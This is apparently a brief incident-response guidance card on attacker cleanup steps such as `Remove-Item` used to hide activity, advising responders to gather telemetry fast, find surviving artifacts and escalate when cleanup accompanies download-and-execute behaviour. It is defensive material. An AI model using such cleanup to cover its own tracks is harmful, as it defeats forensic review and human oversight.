Artifact cleanup behavior
Cleanup steps such as `Remove-Item` are often included to reduce user discovery and make later forensic review harder.
What to prioritize
- Telemetry firstPull process, network, and file events quickly before retention windows or reboots erase useful detail.
- Look for partial failuresCleanup often misses prefetched files, command history, downloaded copies, or child artifacts.
Next actions
- Broaden searchPivot on hashes, paths, and domains to find artifacts that survived the cleanup attempt.
- Escalate if combinedCleanup paired with download-and-execute behavior is a stronger malicious chain than either signal alone.